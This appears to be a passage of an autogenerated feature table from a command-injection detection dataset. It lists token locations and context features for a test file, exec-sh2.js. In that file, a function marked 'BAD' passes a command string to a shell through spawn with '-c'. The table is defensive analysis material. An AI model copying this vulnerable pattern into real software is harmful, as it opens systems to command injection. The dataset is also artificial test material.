execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:7:1:8 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:7:1:8 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:7:1:8 | cp | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:7:1:35 | cp | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:7:1:35 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:7:1:35 | cp | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:7:1:35 | cp = re ... ocess') | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:7:1:35 | cp = re ... ocess') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:7:1:35 | cp = re ... ocess') | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:12:1:18 | require | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:12:1:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:12:1:18 | require | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:12:1:35 | exceptional return of require ... ocess') | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:12:1:35 | exceptional return of require ... ocess') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:12:1:35 | exceptional return of require ... ocess') | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:12:1:35 | require ... ocess') | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:12:1:35 | require ... ocess') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:12:1:35 | require ... ocess') | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:20:1:34 | 'child_process' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:20:1:34 | 'child_process' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:20:1:34 | 'child_process' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:20:1:34 | 'child_process' | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:20:1:34 | 'child_process' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:20:1:34 | 'child_process' | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:2:5:2:8 | http | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:2:5:2:8 | http | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:2:5:2:8 | http | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:2:5:2:26 | http | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:2:5:2:26 | http | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:2:5:2:26 | http | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:2:5:2:26 | http = ... 'http') | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:2:5:2:26 | http = ... 'http') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:2:5:2:26 | http = ... 'http') | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:2:12:2:18 | require | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:2:12:2:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:2:12:2:18 | require | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:2:12:2:26 | exceptional return of require('http') | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:2:12:2:26 | exceptional return of require('http') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:2:12:2:26 | exceptional return of require('http') | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:2:12:2:26 | require('http') | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:2:12:2:26 | require('http') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:2:12:2:26 | require('http') | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:2:20:2:25 | 'http' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:2:20:2:25 | 'http' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:2:20:2:25 | 'http' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:2:20:2:25 | 'http' | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:2:20:2:25 | 'http' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:2:20:2:25 | 'http' | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:3:5:3:7 | url | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:3:5:3:7 | url | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:3:5:3:7 | url | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:3:5:3:7 | url | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:3:5:3:24 | url | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:3:5:3:24 | url | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:3:5:3:24 | url | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:3:5:3:24 | url = require('url') | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:3:5:3:24 | url = require('url') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:3:5:3:24 | url = require('url') | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:3:11:3:17 | require | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:3:11:3:17 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:3:11:3:17 | require | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:3:11:3:24 | exceptional return of require('url') | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:3:11:3:24 | exceptional return of require('url') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:3:11:3:24 | exceptional return of require('url') | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:3:11:3:24 | require('url') | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:3:11:3:24 | require('url') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:3:11:3:24 | require('url') | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:3:19:3:23 | 'url' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:3:19:3:23 | 'url' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:3:19:3:23 | 'url' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:3:19:3:23 | 'url' | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:3:19:3:23 | 'url' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:3:19:3:23 | 'url' | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:5:1:5:0 | this | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:5:1:5:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:5:1:5:0 | this | enclosingFunctionBody | sh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:5:1:5:0 | this | enclosingFunctionName | getShell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:5:1:5:0 | this | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:5:1:7:1 | 'arguments' object of function getShell | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:5:1:7:1 | 'arguments' object of function getShell | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:5:1:7:1 | 'arguments' object of function getShell | enclosingFunctionBody | sh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:5:1:7:1 | 'arguments' object of function getShell | enclosingFunctionName | getShell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:5:1:7:1 | 'arguments' object of function getShell | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:5:1:7:1 | exceptional return of function getShell | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:5:1:7:1 | exceptional return of function getShell | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:5:1:7:1 | exceptional return of function getShell | enclosingFunctionBody | sh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:5:1:7:1 | exceptional return of function getShell | enclosingFunctionName | getShell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:5:1:7:1 | exceptional return of function getShell | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:5:1:7:1 | functio ... "sh";\\n} | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:5:1:7:1 | functio ... "sh";\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:5:1:7:1 | functio ... "sh";\\n} | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:5:1:7:1 | return of function getShell | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:5:1:7:1 | return of function getShell | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:5:1:7:1 | return of function getShell | enclosingFunctionBody | sh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:5:1:7:1 | return of function getShell | enclosingFunctionName | getShell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:5:1:7:1 | return of function getShell | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:5:10:5:17 | getShell | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:5:10:5:17 | getShell | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:5:10:5:17 | getShell | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:5:10:5:17 | getShell | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:5:10:5:17 | getShell | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:5:10:5:17 | getShell | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:5:10:5:17 | getShell | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:6:12:6:15 | "sh" | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:6:12:6:15 | "sh" | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:6:12:6:15 | "sh" | enclosingFunctionBody | sh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:6:12:6:15 | "sh" | enclosingFunctionName | getShell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:6:12:6:15 | "sh" | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:9:0 | cp | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:9:0 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:9:0 | cp | enclosingFunctionBody | command options cp spawn getShell -c command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:9:0 | cp | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:9:0 | cp | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:9:0 | getShell | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:9:0 | getShell | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:9:0 | getShell | enclosingFunctionBody | command options cp spawn getShell -c command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:9:0 | getShell | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:9:0 | getShell | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:9:0 | this | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:9:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:9:0 | this | enclosingFunctionBody | command options cp spawn getShell -c command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:9:0 | this | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:9:0 | this | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:11:1 | 'arguments' object of function execSh | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:11:1 | 'arguments' object of function execSh | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:11:1 | 'arguments' object of function execSh | enclosingFunctionBody | command options cp spawn getShell -c command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:11:1 | 'arguments' object of function execSh | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:11:1 | 'arguments' object of function execSh | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:11:1 | exceptional return of function execSh | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:11:1 | exceptional return of function execSh | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:11:1 | exceptional return of function execSh | enclosingFunctionBody | command options cp spawn getShell -c command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:11:1 | exceptional return of function execSh | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:11:1 | exceptional return of function execSh | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:11:1 | functio ... / BAD\\n} | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:11:1 | functio ... / BAD\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:11:1 | functio ... / BAD\\n} | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:11:1 | return of function execSh | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:11:1 | return of function execSh | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:11:1 | return of function execSh | enclosingFunctionBody | command options cp spawn getShell -c command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:11:1 | return of function execSh | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:1:11:1 | return of function execSh | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:10:9:15 | execSh | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:10:9:15 | execSh | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:10:9:15 | execSh | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:10:9:15 | execSh | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:10:9:15 | execSh | contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:10:9:15 | execSh | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:10:9:15 | execSh | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:17:9:23 | command | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:17:9:23 | command | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:17:9:23 | command | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:17:9:23 | command | contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:17:9:23 | command | enclosingFunctionBody | command options cp spawn getShell -c command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:17:9:23 | command | enclosingFunctionBody | command options cp spawn getShell -c command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:17:9:23 | command | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:17:9:23 | command | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:17:9:23 | command | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:17:9:23 | command | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:26:9:32 | options | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:26:9:32 | options | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:26:9:32 | options | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:26:9:32 | options | contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:26:9:32 | options | enclosingFunctionBody | command options cp spawn getShell -c command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:26:9:32 | options | enclosingFunctionBody | command options cp spawn getShell -c command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:26:9:32 | options | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:26:9:32 | options | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:26:9:32 | options | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:9:26:9:32 | options | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:12:10:13 | cp | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:12:10:13 | cp | contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:12:10:13 | cp | enclosingFunctionBody | command options cp spawn getShell -c command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:12:10:13 | cp | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:12:10:13 | cp | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:12:10:19 | cp.spawn | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:12:10:19 | cp.spawn | contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:12:10:19 | cp.spawn | enclosingFunctionBody | command options cp spawn getShell -c command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:12:10:19 | cp.spawn | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:12:10:19 | cp.spawn | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:12:10:57 | cp.spaw ... ptions) | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:12:10:57 | cp.spaw ... ptions) | contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:12:10:57 | cp.spaw ... ptions) | enclosingFunctionBody | command options cp spawn getShell -c command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:12:10:57 | cp.spaw ... ptions) | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:12:10:57 | cp.spaw ... ptions) | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:12:10:57 | exceptional return of cp.spaw ... ptions) | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:12:10:57 | exceptional return of cp.spaw ... ptions) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:12:10:57 | exceptional return of cp.spaw ... ptions) | enclosingFunctionBody | command options cp spawn getShell -c command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:12:10:57 | exceptional return of cp.spaw ... ptions) | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:12:10:57 | exceptional return of cp.spaw ... ptions) | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:15:10:19 | spawn | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:15:10:19 | spawn | contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:15:10:19 | spawn | enclosingFunctionBody | command options cp spawn getShell -c command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:15:10:19 | spawn | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:15:10:19 | spawn | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:21:10:28 | getShell | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:21:10:28 | getShell | contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:21:10:28 | getShell | enclosingFunctionBody | command options cp spawn getShell -c command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:21:10:28 | getShell | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:21:10:28 | getShell | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:21:10:30 | 